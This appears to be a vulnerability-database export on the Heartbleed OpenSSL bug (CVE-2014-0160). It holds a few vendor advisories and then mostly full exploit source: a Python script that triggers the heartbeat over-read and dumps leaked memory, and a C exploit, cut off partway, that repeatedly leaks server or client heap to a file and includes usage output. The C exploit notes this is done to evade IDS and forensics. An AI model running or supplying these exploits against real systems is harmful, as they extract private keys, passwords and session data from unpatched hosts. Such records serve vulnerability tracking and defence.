The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
{"seebug": [{"lastseen": "2017-11-19T17:26:23", "description": "CVE ID:CVE-2014-0160\r\n\r\nIBM AIX is a commercial operating system.\r\n\r\nThe OpenSSL bundled with IBM AIX contains a security vulnerability: OpenSSL has a boundary error in its handling of the TLS 'heartbeat' extension, which allows an attacker to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents can include private keys, usernames and passwords, and so on.\n0\nIBM AIX 6.x\r\nIBM AIX 7.x\nUsers can refer to the following vendor-provided security patches to fix this vulnerability:\r\nhttp://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc\r\nhttp://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&ID=3489", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "IBM AIX OpenSSL TLS heartbeat information disclosure vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62187", "id": "SSV:62187", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:16", "description": "CVE 
ID:CVE-2014-0160\r\n\r\nMultiple Barracuda products contain a security vulnerability.\r\n\r\nThe OpenSSL bundled with Barracuda products contains a security vulnerability: OpenSSL has a boundary error in its handling of the TLS 'heartbeat' extension, which allows an attacker to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents can include private keys, usernames and passwords, and so on.\n0\nBarracuda CudaTel Communication Server 2.x\r\nBarracuda CudaTel Communication Server 3.x\r\nBarracuda Firewall 6.x\r\nBarracuda Link Balancer 2.x\r\nBarracuda Load Balancer\r\nBarracuda Load Balancer 4.x\r\nBarracuda Load Balancer ADC 5.x\r\nBarracuda Message Archiver\r\nBarracuda Message Archiver 3.x\r\nBarracuda Web Application Firewall 7.x\r\nBarracuda Web Filter\r\nBarracuda Web Filter 7.x\nThe vendor has released an upgrade patch to fix the vulnerability; please download and apply it:\r\nhttps://www.barracuda.com/blogs/pmblog?bid=2279", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "Barracuda multiple products OpenSSL TLS/DTLS heartbeat information disclosure vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62181", "id": "SSV:62181", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:26:52", "description": "CVE 
ID:CVE-2014-0160\r\n\r\nMultiple HP products contain a security vulnerability.\r\n\r\nThe OpenSSL bundled with multiple HP products contains a security vulnerability: OpenSSL has a boundary error in its handling of the TLS 'heartbeat' extension, which allows an attacker to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents can include private keys, usernames and passwords, and so on.\n0\nHP Onboard Administrator 4.x\r\nHP AssetManager 9.x\r\nHP Diagnostics 9.x\r\nHP IT Executive Scorecard 9.x\r\nHP LoadRunner 11.x\r\nHP LoadRunner 12.x\r\nHP OpenView Connect-It (CIT) 9.x\r\nHP Performance Center 11.x\r\nHP Performance Center 12.x\r\nHP Server Automation 10.x\r\nHP Service Manager 9.x\r\nHP Smart Update Manager (HP SUM) 6.x\r\nHP System Management Homepage 7.x\r\nHP UCMDB Browser 1.x\r\nHP UCMDB Browser 2.x\r\nHP UCMDB Browser 3.x\r\nHP Universal Discovery Universal CMDB Configuration Manager 10.x\r\nHP Universal Discovery Universal CMDB Configuration Manager 9.x\nNo detailed solution is currently available:\r\nhttp://www.hp.com", "cvss3": {}, "published": "2014-04-16T00:00:00", "title": "HP multiple products OpenSSL TLS/DTLS heartbeat information disclosure vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62186", "id": "SSV:62186", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T13:55:16", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "type": 
"seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86038", "id": "SSV:86038", "sourceData": "\n # Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n\r\ndef create_hello(version):\r\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 
00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\treturn hello\r\n\r\ndef create_hb(version):\r\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n\treturn hb\r\n\r\ndef hexdump(s):\r\n\tfor b in xrange(0, len(s), 16):\r\n\t\tlin = [c for c in s[b : b + 16]]\r\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n\tprint\r\n\r\ndef recvall(s, length, timeout=5):\r\n\tendtime = time.time() + timeout\r\n\trdata = ''\r\n\tremain = length\r\n\twhile remain > 0:\r\n\t\trtime = endtime - time.time()\r\n\t\tif rtime < 0:\r\n\t\t\treturn None\r\n\t\tr, w, e = select.select([s], [], [], 5)\r\n\t\tif s in r:\r\n\t\t\tdata = s.recv(remain)\r\n\t\t\t# EOF?\r\n\t\t\tif not data:\r\n\t\t\t\treturn None\r\n\t\t\trdata += data\r\n\t\t\tremain -= len(data)\r\n\treturn rdata\r\n\r\n\r\ndef recvmsg(s):\r\n\thdr = recvall(s, 5)\r\n\tif hdr is None:\r\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\r\n\t\treturn None, None, None\r\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\r\n\tpay = recvall(s, ln, 10)\r\n\tif pay is None:\r\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\r\n\t\treturn None, None, None\r\n\tprint ' ... 
received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n\treturn typ, ver, pay\r\n\r\ndef hit_hb(s,hb):\r\n\ts.send(hb)\r\n\twhile True:\r\n\t\ttyp, ver, pay = recvmsg(s)\r\n\t\tif typ is None:\r\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\r\n\t\t\treturn False\r\n\r\n\t\tif typ == 24:\r\n\t\t\tprint 'Received heartbeat response:'\r\n\t\t\thexdump(pay)\r\n\t\t\tif len(pay) > 3:\r\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\r\n\t\t\telse:\r\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\r\n\t\t\treturn True\r\n\r\n\t\tif typ == 21:\r\n\t\t\tprint 'Received alert:'\r\n\t\t\thexdump(pay)\r\n\t\t\tprint 'Server returned error, likely not vulnerable'\r\n\t\t\treturn False\r\n\r\ndef main():\r\n\topts, args = options.parse_args()\r\n\tif len(args) < 1:\r\n\t\toptions.print_help()\r\n\t\treturn\r\n\tfor i in range(len(version)):\r\n\t\tprint 'Trying ' + version[i][0] + '...'\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\tprint 'Connecting...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.connect((args[0], opts.port))\r\n\t\tprint 'Sending Client Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hello(version[i][1]))\r\n\t\tprint 'Waiting for Server Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\twhile True:\r\n\t\t\ttyp, ver, pay = recvmsg(s)\r\n\t\t\tif typ == None:\r\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\r\n\t\t\t\treturn\r\n\t\t\t# Look for server hello done message.\r\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\r\n\t\t\t\tbreak\r\n\r\n\t\tprint 'Sending heartbeat request...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hb(version[i][1]))\r\n\t\tif hit_hb(s,create_hb(version[i][1])):\r\n\t\t\t#Stop if vulnerable\r\n\t\t\tbreak\r\n\r\nif __name__ == '__main__':\r\n\tmain()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86038", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:10:46", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86255", "id": "SSV:86255", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. 
\r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n\r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against 
s_server/s_client version 1.0.1d\r\n* \r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* \r\n* \r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ 
=============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* \r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include 
<openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] 
cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\nconnection* dtls_server(int sd, char* server,int port){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n\tunsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] 
cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("bind()");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] 
FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n//\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n//\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n 
}\r\n\treturn c;\r\n}\r\n\r\nconnection* dtls_client(int sd, char* server,int port){\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n\tmemset((char *)&sa,0,sizeof(sa));\r\n\tc = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("connect()");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n\tSSL_set_tlsext_host_name(c->sslHandle,server);\r\n\tbio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n\tBIO_ctrl_set_connected(bio, 1, &sa);\r\n\tSSL_set_bio(c->sslHandle, bio, bio);\r\n\tSSL_set_connect_state (c->sslHandle);\r\n//printf("eshta\\n");\r\n if(SSL_connect(c->sslHandle)!=1) \r\n ERR_print_errors_fp(stderr);\r\n\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway), %d \\n",c->sslHandle->tlsext_heartbeat);\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n 
}\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. 
